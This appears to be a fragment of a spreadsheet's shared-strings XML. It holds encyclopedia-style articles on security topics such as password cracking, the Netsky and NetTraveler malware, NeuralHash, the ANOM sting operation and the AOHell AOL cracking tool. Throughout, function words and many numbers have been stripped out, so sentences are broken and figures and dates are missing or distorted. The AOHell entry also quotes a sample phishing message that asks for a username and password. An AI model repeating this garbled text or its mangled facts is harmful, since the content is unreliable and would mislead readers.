security. boston: artech house. 165. isbn 978-1-63081-013-9. retrieved 2022-06-25 google books. bheemaiah, kariappa (2017). blockchain alternative: rethinking macroeconomic policy economic theory. york: apress. isbn 978-1-4842-2673-5. retrieved 2022-06-25 google books. franco, pedro (2015). understanding bitcoin: cryptography, engineering economics. west sussex: wiley. 174. isbn 978-1-119-01914-5. retrieved 2022-06-25 google books. kalodner, harry; carlsten, miles; ellenbogen, paul; bonneau, joseph; narayanan, arvind (2015). empirical study namecoin lessons decentralized namespace design". workshop economics information security. archived original 2022-06-25. retrieved 2022-06-25. kirillova, elena anatolyevna; pavlyuk, albert valentinovich; mikhaylova, irina aleksandrovna; zulfugarzade, teymur zenin, sergey (2018). "bitcoin, lifecoin, namecoin: legal nature virtual currency". journal advanced research economics. (31). archived original 2022-06-25. retrieved 2022-06-25 central eastern european online library. chang, tao-hung; svetinovic, davor (2016). "data analysis digital currency networks: namecoin case study". institute electrical electronics engineers. doi:10.1109/iceccs.2016.023. isbn 978-1-5090-5526-5. archived original 2022-06-25. retrieved 2022-06-25. external links official website</t>
  </si>
  <si>
    <t>Password fatigue</t>
  </si>
  <si>
    <t>password fatigue feeling experienced many people required remember excessive number passwords part daily routine, computer work, undo bicycle lock conduct banking automated teller machine. concept also known password chaos broadly identity chaos. causes increasing prominence information technology internet employment, finance, recreation aspects people's lives, ensuing introduction secure transaction technology, people accumulating proliferation accounts passwords. according survey conducted february 2020 password manager nordpass, typical user passwords.some factors causing password fatigue are: unexpected demands user create password unexpected demands user create password uses particular pattern letters, digits, special characters demand user type password twice frequent unexpected demands user re-enter password throughout surf different parts intranet blind typing, responding password prompt setting password. responses some companies well organized respect implemented alternative authentication methods adopted technologies user's credentials entered automatically. however, others focus ease use, even worsen situation, constantly implementing applications authentication system. single sign-on software (sso) help mitigate problem requiring users remember password application turn automatically give access several accounts, without need agent software user's computer. potential disadvantage loss single password prevent access services using system, moreover theft misuse password presents criminal attacker many targets. integrated password management software many operating systems provide mechanism store retrieve passwords using user's login password unlock encrypted password database. microsoft windows provides credential manager store user names passwords used websites computers network, keychain feature provides functionality, similar functionality present gnome open source desktops. addition, browser developers added similar functionality major browsers. although, user's system corrupted, stolen compromised, also lose access sites rely password store recovery features remember login data. password management software keepass, password safe nordpass help mitigate problem password fatigue storing passwords database encrypted single password. however, presents problems similar single sign-on losing single password prevents access passwords someone else gaining access them. password recovery majority password-protected services provide password recovery feature allow users recover passwords email address information) tied account. however, system become target social engineering attacks criminals. these criminals obtain enough information target impersonate request reset email, redirected means account attacker's control, enabling attacker hijack account. passwordless authentication solution eliminate password fatigue passwords entirely. passwordless authentication services okta, transmit security secret double octopus replace passwords alternative verification methods biometric authentication security tokens. unlike password management software, passwordless authentication require user create remember password point. also bugmenot decision fatigue identity management password manager password strength security question usability authentication systems notes external links noguchi, yuki. access denied, washington post, september 2006. catone, josh. form: same password everything, january 2008.</t>
  </si>
  <si>
    <t>Lenny (bot)</t>
  </si>
  <si>
    <t>lenny chatbot designed scam bait telemarketers using messages. background telemarketers perceived annoying wasting people's time, deliberately attempt scam defraud people. april 2018, survey estimated united states receives three billion telemarketing calls month. attempts block callers hindered spoofing. features written 2011, development taken alberta-based programmer known "mango" years later. driven sixteen pre-recorded audio clips, spoken soft slow australian accent manner elderly man. there speech recognition artificial intelligence, bot's software simple straightforward. first four clips played sequentially order grab telemarketer's interest begin sales pitch lenny, remaining twelve played sequentially loop telemarketer hangs program waits seconds silence playing next audio clip, simulate natural breaks conversation. messages purposefully vague open-ended applied many conversations possible. they include references lenny's children, state economy, interrupted ducks outside.according research bot, around callers realise talking computer program within minutes; however, calls lasted around hour. distribution though chatbots developed earlier, lenny first released free public server could accessed anyone. recordings conversations widely shared online websites reddit youtube. though "mango" intended lenny used dishonest telemarketers, scammers, mind used callers merely annoying. also used political campaigners, supporter pierre poilievre 2015 canadian federal election, donald trump 2016 united states elections. also scam baiting references external links lenny troll raspberry home phone source code lenny soundcloud</t>
  </si>
  <si>
    <t>Android Privacy Guard</t>
  </si>
  <si>
    <t>android privacy guard (apg) free open-source android operating system provides strong, user-based encryption compatible pretty good privacy (pgp) privacy guard (gpg) programs. this allows users encrypt, decrypt, digitally sign, verify signatures text, emails, files. application allows user store credentials users interact, encrypt files specified user decrypt them. manner, file received another user credentials saved, receiver verify authenticity file decrypt necessary. specific implementation relies spongy castle apis. updated since march 2014 longer active development. development picked openkeychain. reception after initial release june 2010, gained strong following 2000 reviews 100,000 installs google play store. several tutorials written instruct users android phone. these tutorials generally reference apgs interaction mail android e-mail client. openkeychain between december 2010 october 2013 version released. light global surveillance disclosures lack development viewed critically community. september 2013 fork released, version openkeychain. some features improvements subsequently merged back apg. however, process stopped march 2014, openkeychain project continued release versions. february 2016 development openkeychain active apg. notable features openkeychain include modern user interface, support yubikey neo. references external links github repository software reviews tutorials guardian project: lockdown mobile email setting scratch</t>
  </si>
  <si>
    <t>NetTraveler</t>
  </si>
  <si>
    <t>nettraveler travnet spyware dates 2004 actively used least 2016, infecting hundreds often high-profile servers dozens countries.the name malware based fact early versions contained string "nettraveler running!". used attackers advanced persistent threats survey victims. transfer large amounts private information systems victims servers, functioning trojan horse backdoor systems.spear-phishing office documents like word documents used infect vulnerable systems, targeting cve-2012-0158 cve-2010-3333 vulnerabilities. attackers news articles relevant targets spear fishing.kaspersky found certain victims infected nettraveler also infected october, although direct relation malware established. multiple infections might accounted fact high-profile victims like government agencies, nuclear power installations embassies dozens countries.command control servers involved nettraveler attacks located united states, hong kong china, used urls. these servers mostly 6/7. according kaspersky lab, nettraveler used medium-sized threat actor group china. there several ways nettraveler infected system, like virus removal tools spyhunter removal tool. also possible remove malware manually. references external links nettraveler (aka ‘travnet’) global research analysis team kaspersky</t>
  </si>
  <si>
    <t>Netsky (computer worm)</t>
  </si>
  <si>
    <t>netsky prolific family computer worms affect microsoft windows operating systems. first variant appeared monday, february 2004. variant first family member find mass distribution. appeared wednesday, february 2004. 18-year-old sven jaschan germany confessed written these, worms, sasser. although individual functions vary widely virus virus, netsky family perhaps famous comments contained within code variants insulting authors bagle mydoom worm families and, cases, routines removed versions viruses. "war" referred media caused steady increase number variant viruses produced families. june 2004, bagle approximately netsky approximately mydoom approximately other symptoms netsky included beeping sounds specified dates, usually morning hours. worm sent e-mail, enticing recipients open attachment. once opened, attached program would scan computer e-mail addresses e-mail addresses found. until october 2006, variant virus remained prevalent virus sent e-mail throughout world, despite half years old. surpassed variant stration malware family november 2006.drum bass musician netsky based artist name computer worm. idea behind chance people would download virus searched internet illegally download music. also timeline notable computer viruses worms computer virus computer worms sasser (computer worm) references external links netsky sasser author arrested netsky sasser author trial</t>
  </si>
  <si>
    <t>Android Developer Challenge</t>
  </si>
  <si>
    <t>android developer challenge (adc) launched google 2008, providing awards high-quality mobile applications built android platform. november 2009, winners android developers challenge selected rounds scoring thousands android users well official panel judges. overall winners sweetdreams, what doodle!? wavesecure. history android software stack mobile devices includes operating system, middleware applications. android provides tools apis necessary begin developing applications android-powered devices. android developer challenge competition innovative applications android. google offered us$10 million prizes, distributed entries judged panel experts fields mobile devices, cellular telecommunications, software development technology innovation. google selected judges member organizations open handset alliance, google mobile experts. android developer challenge android developer challenge first announced january, submissions accepted january april 2008. with participants countries total 1,788 entries, immediate success, android developers' blog reported submission rate 170+ submissions hour april.developers united states accounted one-third total applications rest came countries germany, japan, china, india, canada, france, many others. entries represented diverse range application areas, including games, social-networking applications, utilities productivity developer tools. panel judges received judging packets laptops preloaded submissions, consistent, fair environment judge submissions. after three weeks rigorous analysis, judges released list first round winners, eligible participate final round. these promising entries, announced 2008, received $25,000 award fund development. finalists given deadline june 2008 submit applications final round. competition concluded announcement teams received $275,000 each, teams received $100,000 each. entire list $275,000 award recipients, $100,000 award recipients, finalists judges viewed here. android developers challenge announced 2009., calling developers submit apps specially-designated categories august. categories were: education/reference games: casual/puzzle games: arcade/action social networking lifestyle productivity/tools media entertainment travel miscapplicants allowed submit applications single category only. winners selected rounds scoring thousands android users well official panel judges. eligibility contest open applications made publicly available android market prior august 2009. additionally, applications entered contest ineligible contest, regardless whether winning apps. similarly, updated versions applications entered contest ineligible first round, september 2009, users android-powered handsets could access android market able obtain special judging application android market. with app, could download, test, rank applications submitted challenge. users choosing participate review process downloaded submitted apps randomly rated along number criteria, resulting final score app. results first round generated applications categories (200 apps total), went second round. first round closed october 2009. first-round winners announced november 2009. second round, voting second round opened ended november android users able download final applications category evaluate manner first round using judging app. voting period, applications category ranked, community vote constituting final judging score. along public ranking, team google-selected judges evaluated applications. their scores constituted final score. google announced winners november sweetdreams, what doodle!? wavesecure nominated overall winners challenge. furthermore, 1st, prizes awarded categories. also android (operating system) references</t>
  </si>
  <si>
    <t>NetInfo</t>
  </si>
  <si>
    <t>netinfo system configuration database nextstep versions v10.4 "tiger". netinfo replaces unix system configuration files, though still present running machine single user mode; unix apis wrap around netinfo instead. netinfo stores system wide network-type configuration information, users groups, binary databases; machine application specific settings stored plist files. history netinfo introduced nextstep version 0.9, replaced unix system configuration files microsystems' network information service (yellow pages) next computers. immediately caused controversy, much unfavorable. netinfo unique next computers (although next later licensed netinfo xedoc, australian software company produced netinfo unix systems), queries went netinfo. this situation basic tasks translating unix user name string would complete netinfo stalled lookup. first, possible disable netinfo unix system files, nextstep version disabling netinfo also disabled support. thus, next computers became notorious locking user everyday tasks server stopped responding. version netinfo remedied (and many problems), early problems, netinfo never took world unix system configuration. apple moved away using netinfo towards ldap, particularly server. [1]. v10.4 last version support netinfo. beginning v10.5, netinfo completely phased replaced local search node named dslocal, files located /var/db/dslocal/ standard property list (xml-based) files. files netinfo database stored /private/var/db/netinfo/local.nidb/, accessed root. viewed modified application programming interface, netinfo manager utility, command line tools niutil. netinfo completely removed 10.5, netinfo-based command line tools also phased replaced tools. also, netinfo manager removed. data netinfo stores following data: afpuser_aliases aliases exports (nfs shares) groups machines mounts networks printers protocols rpcs services users also apple open directory references external links netinfo page</t>
  </si>
  <si>
    <t>Password cracking</t>
  </si>
  <si>
    <t>cryptanalysis computer security, password cracking process recovering passwords data stored transmitted computer system scrambled form. common approach (brute-force attack) repeatedly guesses password check available cryptographic hash password. another type approach password spraying, often automated occurs slowly time order remain undetected, using list common passwords.the purpose password cracking might help user recover forgotten password (due fact installing entirely password would involve system administration privileges), gain unauthorized access system, preventive measure whereby system administrators check easily crackable passwords. file-by-file basis, password cracking utilized gain access digital evidence judge allowed access, particular file's permissions restricted. time needed password searches time crack password related strength (see password strength), measure password's entropy, details password stored. most methods password cracking require computer produce many candidate passwords, checked. example brute-force cracking, computer tries every possible password succeeds. with multiple processors, time optimized searching last possible group symbols beginning time, processors placed search designated selection possible passwords. more common methods password cracking, dictionary attacks, pattern checking, word list substitution, etc. attempt reduce number trials required usually attempted brute force. higher password strength exponentially increases number candidate passwords must checked, average, recover password reduces likelihood password found cracking dictionary.the ability crack passwords using computer programs also function number possible passwords second checked. hash target password available attacker, number billions trillions second, since offline attack possible. not, rate depends whether authentication software limits often password tried, either time delays, captchas, forced lockouts number failed attempts. another situation quick guessing possible password used form cryptographic key. cases, attacker quickly check guessed password successfully decodes encrypted data. kinds password hash, ordinary desktop computers test hundred million passwords second using password cracking tools running general purpose billions passwords second using gpu-based password cracking tools (see: john ripper benchmarks). rate password guessing depends heavily cryptographic function used system generate password hashes. suitable password hashing function, bcrypt, many orders magnitude better naive function like simple sha. user-selected eight-character password numbers, mixed case, symbols, commonly selected passwords dictionary matches filtered out, reaches estimated 30-bit strength, according nist. billion permutations would cracked seconds hashing function naive. when ordinary desktop computers combined cracking effort, done botnets, capabilities password cracking considerably extended. 2002, distributed.net successfully found 64-bit four years, effort included 300,000 different computers various times, generated average billion keys second.graphics processing units speed password cracking factor general purpose computers specific hashing algorithms. 2011, available commercial products claim ability test 2,800,000,000 passwords second standard desktop computer using high-end graphics processor. such device crack 10-letter single-case password day. work distributed many computers additional speedup proportional number available computers comparable gpus.. however algorithms slowly, even specifically designed slowly, gpus. examples des, triple des, bcrypt, scrypt, argon2. emergence past decade hardware acceleration enabled resources used increase efficiency speed brute force attack hashing algorithms. 2012, stricture consulting group unveiled 25-gpu cluster achieved brute force attack speed billion guesses second, allowing check {\textstyle 95^{8}} password combinations hours. using ocl-hashcat plus virtual opencl cluster platform, linux-based cluster used "crack percent million password hashes belonging users linkedin."for specific hashing algorithms, cpus gpus good match. purpose-made hardware required high speeds. custom hardware made using fpga asic technology. development technologies complex (very) expensive. general, fpgas favorable small quantities, asics favorable (very) large quantities, energy efficient, faster. 1998, electronic frontier foundation (eff) built dedicated password cracker using asics. their machine, deep crack, broke 56-bit hours, testing billion keys second. 2017, leaked documents show asics used military project code-break entire internet. designing building asic-basic password crackers assumed reach non-governments. since 2019, john ripper supports password cracking limited number hashing algorithms using fpgas. commercial companies using fpga-based setups password cracking. easy remember, hard guess passwords difficult remember reduce security system users might need write electronically store password using insecure method, users need frequent password resets, users likely re-use password.similarly, stringent requirements password strength, e.g. "have uppercase lowercase letters digits" "change monthly", greater degree users subvert system.in "the memorability security passwords", jeff examine effect advice given users good choice password. they found passwords based thinking phrase taking first letter word memorable naively selected passwords, hard crack randomly generated passwords. combining unrelated words another good method. having personally designed "algorithm" generating obscure passwords another good method. however, asking users remember password consisting "mix uppercase lowercase characters" similar asking remember sequence bits: hard remember, little harder crack (e.g. times harder crack 7-letter passwords, less user simply capitalizes letters). asking users "both letters digits" often lead easy-to-guess substitutions '1': substitutions well known attackers. similarly, typing password keyboard higher common trick known attackers. research detailed april 2015 paper several professors carnegie mellon university shows people's choices password structure often follow several known patterns. result, passwords much easily cracked mathematical probabilities would otherwise indicate. passwords containing digit, example, disproportionately include password. incidents july 1998, cert reported incident attacker found 186,126 encrypted passwords. time discovered, already cracked 47,642 passwords.in december 2009, major password breach rockyou.com occurred release million passwords. attacker leaked full list million passwords (with identifiable information) internet. passwords stored cleartext database extracted injection vulnerability. imperva application defense center (adc) analysis strength passwords.in june 2011, nato (north atlantic treaty organization) suffered security breach public release first last names, usernames, passwords 11,000 registered users e-bookshop. data leaked part operation antisec, movement includes anonymous, lulzsec, hacking groups individuals.on july 2011, booz allen hamilton, large american consulting firm substantial amount work pentagon, servers hacked anonymous leaked day. "the leak, dubbed 'military meltdown monday', includes 90,000 logins military personnel—including personnel uscentcom, socom, marine corps, various force facilities, homeland security, state department staff, looks like private-sector contractors." these leaked passwords found hashed unsalted sha-1, later analyzed team imperva, revealing even military personnel used passwords weak "1234".on july 2011, microsoft hotmail banned password: "123456".in july 2015, group calling "the impact team" stole user data ashley madison. many passwords hashed using relatively strong bcrypt algorithm weaker hash. attacking latter algorithm allowed million plaintext passwords recovered password cracking group cynosure prime. prevention method preventing password cracked ensure attackers cannot access even hashed password. example, unix operating system, hashed passwords originally stored publicly accessible file /etc/passwd. modern unix (and similar) systems, hand, stored shadow password file /etc/shadow, accessible programs running enhanced privileges (i.e., "system" privileges). this makes harder malicious user obtain hashed passwords first instance, however many collections password hashes stolen despite protection. common network protocols transmit passwords cleartext weak challenge/response schemes.another approach combine site-specific secret password hash, prevents plaintext password recovery even hashed values purloined. however privilege escalation attacks steal protected hash files also expose site secret. third approach derivation functions reduce rate passwords guessed.: 5.1.1.2 another protection measure salt, random value unique password incorporated hashing. salt prevents multiple hashes attacked simultaneously also prevents creation pre-computed dictionaries rainbow tables. modern unix systems replaced traditional des-based password hashing function crypt() stronger methods crypt-sha, bcrypt, scrypt. other systems also begun adopt methods. instance, cisco originally used reversible vigenère cipher encrypt passwords, uses md5-crypt 24-bit salt "enable secret" command used. these newer methods large salt values prevent attackers efficiently mounting offline attacks multiple user accounts simultaneously. algorithms also much slower execute drastically increases time required mount successful offline attack.many hashes used storing passwords, family, designed fast computation memory requirements efficient implementation hardware. multiple instances algorithms parallel graphics processing units (gpus), speeding cracking. result, fast hashes ineffective preventing password cracking, even salt. some stretching algorithms, pbkdf2 crypt-sha iteratively calculate password hashes significantly reduce rate passwords tested, iteration count high enough. other algorithms, scrypt memory-hard, meaning require relatively large amounts memory addition time-consuming computation thus difficult crack using gpus custom integrated circuits. 2013 long-term password hashing competition announced choose new, standard algorithm password hashing, argon2 chosen winner 2015. another algorithm, balloon, recommended nist. both algorithms memory-hard. solutions like security token give formal proof answer constantly shifting password. those solutions abruptly reduce timeframe available brute forcing (the attacker needs break password within single shift) reduce value stolen passwords short time validity. software there many password cracking software tools, popular aircrack-ng, cain abel, john ripper, hashcat, hydra, davegrohl, elcomsoft. many litigation support software packages also include password cracking functionality. most packages employ mixture cracking strategies; algorithms brute-force dictionary attacks proving productive.the increased availability computing power beginner friendly automated password cracking software number protection schemes allowed activity taken script kiddies. also brute-force attack cold boot attack dictionary attack password strength smudge attack references external links philippe oechslin: making faster cryptanalytic time-memory trade-off. crypto 2003: pp617–630 roundup leaks made anonymous lulzsec 2011 international passwords conference password security: past, present, future, passwords12 presentation skullsecurity list breached password collections</t>
  </si>
  <si>
    <t>Network Information Service</t>
  </si>
  <si>
    <t>network information service, (originally called yellow pages yp), client–server directory service protocol distributing system configuration data user host names computers computer network. microsystems developed nis; technology licensed virtually unix vendors. because british telecom owned name "yellow pages" registered trademark united kingdom paper-based, commercial telephone directory, changed name system nis, though commands functions still start "yp".a nis/yp system maintains distributes central directory user group information, hostnames, e-mail aliases text-based tables information computer network. example, common unix environment, list users identification placed /etc/passwd secret authentication hashes /etc/shadow. adds another "global" user list used identifying users client domain. administrators ability configure serve password data outside processes authenticate users using various versions unix crypt(3) hash algorithms. however, cases, nis(0307) client retrieve entire password database offline inspection. successor technologies original design seen inherent limitations, especially areas scalability security, technologies come replace introduced nis+ part solaris 1992, intention eventually supersede nis. nis+ features much stronger security authentication features, well hierarchical design intended provide greater scalability flexibility. however, also cumbersome administer, difficult integrate existing environment many existing users wished. nis+ removed solaris 11.as result, many users choose stick nis, time modern secure distributed directory systems, notably lightweight directory access protocol (ldap), came replace example, slapd (the standalone ldap daemon) generally runs non-root user, sasl-based encryption ldap traffic natively supported. large lans, servers provide better nameserver functionality ldap provide, leaving site-wide identification information master slave systems serve. however, functions‍—‌such distribution netmask information clients, well maintenance e-mail aliases‍—‌may still performed ldap. maintains database information file well called maps. also dynamic host configuration protocol (dhcp) hesiod (name service) name service switch (nss) network information system, broader manage system networks references external links thorsten kukuk (2003-07-01). "the linux nis(yp)/nys/nis+ howto". linux documentation project. emery (2005-04-15). "distributed authentication system (das) handbook". archived original 2006-07-15. kristy westphal (2001-01-22). "nfs security". symantec. "red enterprise linux 2.2.3. securing nis". hat. frédéric raynal (2001-06-29). "yellow pages, part ibiblio. rhel remove support alexander bokovoy, principal software engineer slide show</t>
  </si>
  <si>
    <t>Password bank</t>
  </si>
  <si>
    <t>password bank software secures place users store unlimited passwords user names. program integrates voice biometric authentication (speaker recognition) minimum three layers data encryption. password bank confused password manager, typically encrypts data (passwords), utilizes different mechanism voice biometric authentication. origins password banks average user needs remember passwords, leaving many users corners. challenge remembering passwords tends invoke actions: changing passwords regular basis using single password websites. with latter, attacker would need break password harvest individual's entire online identity. password cracking issue professional organizations protecting against. june 2011, storage service drop failed protect password authentication period four hours, exposing files million users. ponemon institute surveyed information technology, security, compliance professionals. over half cited emails main cause data leaks.as result, industry experts continue seek alternatives standard passphrase authentication systems. opus senior analyst researcher miller said “voice biometrics strikes right balance strong authentication usability.” opus research connection validsoft concluded “the conditions ripe emergence voice biometrics dominant means authentication, particularly financial transactions. drivers growth mobile banking e-finance together intrinsic lack security mobile devices. secure means authenticating mobile devices increasing necessity.” vulnerabilities critics voice biometrics identified duplication biggest challenge. prevalent risk someone copying individual's voice slowed integration biometrics data security systems. password bank works around pitfall implementing process known random phrasology. each human voice unique consists 2000 biometric parameters. voice biometric software records highly specific timber voice creates unique proprietary authentication. each time user attempts prompted read random phrase. password bank minimum phrases built software. users granted three opportunities read phrase accurately. sentence read properly voice parameters (timber) match attempted user's pre-recorded voice, logged terms duplication probability, less cent chance copied voice could match random phrase. encryption password bank differs password manager encryption mechanism secure data (passwords) includes three layers different encryption families. addition, data encrypted within private clouds well along public clouds (between mobile devices pcs.) data stored secure private corporate clouds referred “rested.” data shared independent devices considered motion.” distinction represents significant shift communication data sent shared remote locations. modular approach password banks utilize modular approach designing data security systems. software utilizing modular programming divides mechanisms authentication authorization separate components, allowing part removed reconfigured ease. password banks built premise solid security (voice biometric authentication three layered encryption) interfere ease use. references external links exploration voice biometrics</t>
  </si>
  <si>
    <t>Network Investigative Technique</t>
  </si>
  <si>
    <t>network investigative technique, nit, form malware hacking) employed since least 2002. drive-by download computer program designed provide access computer. controversies usage raised fourth amendment concerns jurisdictional issues. date, despite court order, declined provide complete code child abuse case involving anonymity network. 2016 mozilla filed amicus curiae brief inasmuch fbi's exploit mozilla firefox browsers potentially puts millions users risk. asked exploit told told defendant, thus raising fifth amendment issues well. also, district judge robert bryan tacoma, washington ruled defendant united states michaud right review code, government also right keep secret (two federal judges related cases ruled suppress evidence found result nit); 2016, however, ruled "for reasons stated orally record, evidence nit., search warrant issued based nit., fruits warrant excluded offered evidence trial..."in march 2017 american civil liberties union, electronic frontier foundation, national association criminal defense lawyers released 188-page guide enable meaningful amendment analysis. april minnesota judge ruled warrant invalid moment signed, given agent knew exceed jurisdictional requirements rule evidence gathered warrant served hence fruit poison tree. also computer internet protocol address verifier operation pacifier operation torpedo references external links playpen affidavit ferrell warrant describing aspects mozilla amicus curiae</t>
  </si>
  <si>
    <t>NeuralHash</t>
  </si>
  <si>
    <t>neuralhash byproduct apple inc, reported early august 2021 child sexual abuse material (csam) system using perceptual hash. technical summary document, nicely explains system copious diagrams example photographs, offers "instead scanning images corporate] icloud [servers], system performs on-device matching using database known csam image hashes provided [the national center missing exploited children] (ncmec) child-safety organizations. apple transforms database unreadable hashes, securely stored users’ devices." history technical summary document released early august 2021 shocked infosec world. greg nojeim center democracy technology said "apple replacing industry-standard end-to-end encrypted messaging system infrastructure surveillance censorship."neuralhash roll macos monterey, apple watches.already month introduction researcher goes username "asuhariet ygvar" posted code github "reconstructed python version neuralhash" named appleneuralhash2onnx (anh2o) ygvar "claimed reverse-engineered previous versions ios." ygvar recognized "nhcalc" contribution, compute neuralhash given image, username "khaos tian" happens work menlo park.later week cory cornelius, researcher intel labs, published results anh2o produced grave image collision error distinct images produce hash result. turns out, perceptual hashes known collision-prone. fact, matthew green johns hopkins university warned "the system could used frame innocent people sending seemingly innocuous images designed trigger matches child pornography. researchers able pretty easily." green said believes apple "sent clear signal" view, safe build systems scan users' phones prohibited content."ross anderson, professor cambridge university, said absolutely appalling idea, going lead distributed bulk surveillance phones laptops."edward snowden said: matter well-intentioned, apple rolling mass surveillance entire world this. make mistake: scan kiddie porn today, scan anything tomorrow. they turned trillion dollars devices inarcs--without asking."on august 2021 wall street journal reporter interviewed apple software chief craig federighi minutes give opportunity defend technology. federighi pains point companies like google, facebook microsoft similar technology process users' electronic files servers. what apple sought process right users' client devices.one result electronic frontier foundation (eff) launched petition calling apple bury system, headline “tell apple: don’t scan phones.”in essay entitled "the problem with perceptual hashes", professional working field named oliver kuederle produces startling collision generated piece commercial neural software, neuralhash type. photographic portrait real woman (adobe stock #221271979) reduces test algorithm hash photograph piece abstract (from "deposit photos" database). both sample images commercial databases. kuederle concerned collisions like this. "these cases manually reviewed. that according apple, apple employee look (flagged) pictures... perceptual hashes messy. when algorithms used detect criminal activities, especially apple scale, many innocent people potentially face serious problems... needless say, quite worried this."one generated image whose neuralhash written image itself. neuralhash c78fc26ec100f8508d4e60a3 cartoon images courtroom scene: first defense attorney indicates "innocent!" second prosecutor says "guilty!".a cybersecurity fellow german marshall fund united states wrote would trivial german government request apple configure csam detection system flag hate symbols swastikas order prevent flagged images videos exported device. every country could develop specific laws related illicit materials impossible enforce without technology companies like apple building on-device detection systems."on september 2021 apple announced shelved plans implement neuralhash amidst concerns system could abused authoritarian states. took weeks petition reach 25,000 signatures.on october 2021 forbes reported experts written joint paper entitled "bugs pockets: risks client-side scanning" debunk rosy picture painted apple. authors included stars like ronald rivest bruce schneier, wrote that: instead targeted capabilities wiretap communications warrant perform forensics seized devices, agencies’ direction travel bulk scanning everyone’s private data, time, without warrant suspicion. that crosses line. rivest paper covered guardian observed apple referred press release said "based feedback customers, advocacy groups, researchers others, decided take additional time coming months collect input make improvements releasing critically important child safety features."on december 2021 swiss researcher notice apple removed material csam website. references</t>
  </si>
  <si>
    <t>ANOM</t>
  </si>
  <si>
    <t>anom (also stylized an0m λnøm) sting operation (known operation trojan shield operation ironside) collaboration enforcement agencies several countries, running 2018 2021, intercepted millions messages sent supposedly secure smartphone-based messaging anom. anom service widely used criminals, instead providing secure communication, actually trojan horse covertly distributed united states federal bureau investigation (fbi) australian federal police (afp), enabling monitor communications. through collaboration enforcement agencies worldwide, operation resulted arrest suspects allegedly involved criminal activity, countries. among arrested people alleged members australian-based italian mafia, albanian organised crime, outlaw motorcycle clubs, drug syndicates organised crime groups. background shutdown canadian secure messaging company phantom secure march 2018 left international criminals need alternative system secure communication. around time, diego branch working person developing "next-generation" encrypted device criminal networks. person facing charges cooperated exchange reduced sentence. person offered develop anom distribute criminals existing networks. first communication devices anom offered informant three former distributors phantom secure october 2018.the also negotiated unnamed third country communication interception, based court order allowed passing information back fbi. since october 2019, anom communications passed third country.the named operation "trojan shield", named "ironside". europol setup operational task force greenlight. distribution usage anom devices consisted messaging running android smartphones specially modified disable normal functions voice telephony, email, location services, addition entry screen scrambling randomise layout numbers, deletion information phone specific entered, option automatic deletion information unused specific period time.the opened entering specific calculation within calculator app, described developer grapheneos "quite amusing security theater", messaging communicated devices supposedly secure proxy servers, also unknown app's users copied sent messages servers controlled fbi. could decrypt messages private associated message, without ever needing remote access devices. devices also fixed identification number assigned user, allowing messages user connected other.about devices distributed australia beta testing october 2018. intercepted communications showed every device used criminal activities, primarily used organised criminal gangs. about devices shipped different drop-off points united states 2020.use spread word mouth, also encouraged undercover agents; drug trafficker hakan ayik identified someone trusted going able successfully distribute platform", without knowledge encouraged undercover agents sell devices black market, expanding use. after users devices requested smaller newer phones, devices designed sold; customer service technical assistance also provided company. commonly used languages dutch, german swedish.after slow start, rate distribution anom increased mid-2019. october 2019, several hundred users. 2021, 11,800 devices anom installed, 9,000 use. zealand users anom communication system. swedish police access conversations 1,600 users, focused surveillance users. europol stated million messages collected anom devices across countries.some skepticism exist; march 2021 wordpress blog post called scam. arrests reactions sting operation culminated search warrants executed simultaneously around globe june 2021. entirely clear date chosen, news organisations speculated might related warrant server access expiring june. background sting operation transnational nature revealed following execution search warrants. over people arrested countries. among arrested people alleged members australian-based italian mafia, albanian organised crime, outlaw motorcycle gangs, drug syndicates crime groups. european union, arrests coordinated europol. arrests also made united kingdom, although national crime agency unwilling provide details number arrested.the seized evidence included almost tons drugs (over eight tons cocaine, tons cannabis cannabis resin, tons synthetic drug precursors, tons synthetic drugs), guns, luxury cars million various currencies cryptocurrencies. australia, people arrested total charges. zealand, people arrested faced total charges. police seized $3.7 million assets, including vehicles, drugs, firearms million cash.over course three years, 9,000 police officers across countries involved sting operation. australian prime minister scott morrison said sting operation "struck heavy blow organised crime". europol described "biggest ever enforcement operation encrypted communication".in 2022, motherboard journalist joseph published documents stating obtained message data cooperation unnamed country within european union. australia about devices sold australia. police arrested suspects seized firearms confiscated cash possessions valued million aud. germany germany, majority police activity state hesse nationwide suspects arrested. police searched locations many cases suspicion drug trafficking. netherlands netherlands, people arrested dutch police investigated drug production facilities narcotics caches. police also seized eight firearms, large supplies narcotics million euros. sweden sweden, people arrested part operation. according police sweden received intelligence fbi, early phase operation discovered many suspects sweden. linda staaf, head swedish police's intelligence activities, said suspects sweden higher rate violent crime countries. united states arrests made united states privacy laws prevented enforcement collecting messages domestic subjects. however, united states department justice indicted seventeen persons (all foreign nationals) racketeer influenced corrupt organizations participation "the anom enterprise" spread devices. also encrochat network infiltrated enforcement investigate organized crime europe ennetcom network seized dutch authorities, used make arrests global communications network service provider based vancouver, canada references external links anom.io domain seized june 2021, displays graphics, "trojan shield" graphic "this domain seized" notice, form inviting visitors determine account associated ongoing investigation, please enter device details below"</t>
  </si>
  <si>
    <t>AOHell</t>
  </si>
  <si>
    <t>aohell windows application used simplify 'cracking' using aol. history aohell first would become thousands programs designed hackers created aol. 1994, seventeen year hacker koceilah rekouche, pittsburgh, known online chronic", used visual basic create toolkit provided: client, credit card number generator, email bomber, bomber, punter, basic instructions. billed all-in-one nice convenient break federal fraud law, violate interstate trade regulations, rack couple good telecommunications infractions fell swoop". when program loaded, would play short clip dre's 1993 song "nuthin thang". most notably, program included function stealing passwords america online users and, according creator, contains first recorded mention term "phishing". aohell provided number utilities america online client software. though utilities simply manipulated interface, powerful enough almost curious party anonymously cause havoc aol. first version program released 1994 hackers known rizzer, squirrel. features fake account generator would generate new, fully functional account user lasted month. this generator worked exploiting algorithm used credit card companies known luhn algorithm dynamically generate apparently legitimate credit card numbers. account would disabled first billed (and discovered credit card invalid). generator could also generate fake addresses phone numbers, resembling surface legitimate personal information. example fake account generator macintosh one-click based piece software called fake maker written user known mcdawgg within macwarez community. this software parallel program create fake accounts based upon generated legitimate credit card account numbers. this software ultimately released versions helped create thousands fake accounts weakened ability expedient account verification. phishing tools. program included "fisher" tool 1995 enabled hackers steal passwords credit card information automated social engineering. program would barrage random users instant messages like:hi, customer service. we're running security check need verify account. please enter username password continue. punter (im-bomber), would send malicious instant message(s) another user would sign off. mail bomb script would rapidly send e-mails user's inbox full. flooding script would flood chat room ascii offensive nature, finger toilet. 'artificial intelligence bot', really contain artificial intelligence, ability automatically respond message chatroom upon identification keywords. (for example, 'profane language' autoresponse built program.) manager, provided facilities automatically respond block certain users. steve case cloak, allowed users pose founder steve case chat rooms. motives legacy existence aohell similar 